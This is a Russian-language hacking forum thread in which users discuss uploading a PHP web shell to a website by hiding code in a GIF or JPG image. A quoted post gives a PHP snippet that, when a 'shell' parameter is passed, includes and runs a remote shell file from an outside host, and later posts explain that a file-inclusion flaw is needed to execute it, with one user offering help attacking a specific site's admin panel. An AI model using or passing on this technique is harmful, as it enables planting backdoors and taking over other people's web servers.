 |
|
09.05.2009, 11:39
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
сделал всё как надо серавно тупит!!!
|
|
|
04.02.2010, 23:43
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами:
8580976
Репутация:
0
|
|
Сообщение от m0Hze
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
|
|
|
|
05.02.2010, 00:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от oiki
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
|
|
|
|
05.02.2010, 00:57
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами:
8580976
Репутация:
0
|
|
в таком случае есть ли еще способы?
|
|
|
|
05.02.2010, 01:04
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от oiki
в таком случае есть ли еще способы?
В каком именно случае?
|
|
|
|
05.02.2010, 03:31
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами:
8580976
Репутация:
0
|
|
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
|
|
|
|
05.02.2010, 03:32
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от oiki
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает
|
|
|
|
05.02.2010, 03:37
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами:
8580976
Репутация:
0
|
|
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Последний раз редактировалось oiki; 05.02.2010 в 03:52..
|
|
|
|
05.02.2010, 13:46
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами:
9533780
Репутация:
97
|
|
Сообщение от oiki
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Если есть админка то тут намного проще! напиши двиг сайта может смогу помочь! 
|
|
|
|
05.02.2010, 14:37
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами:
11200586
Репутация:
1398
|
|
Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
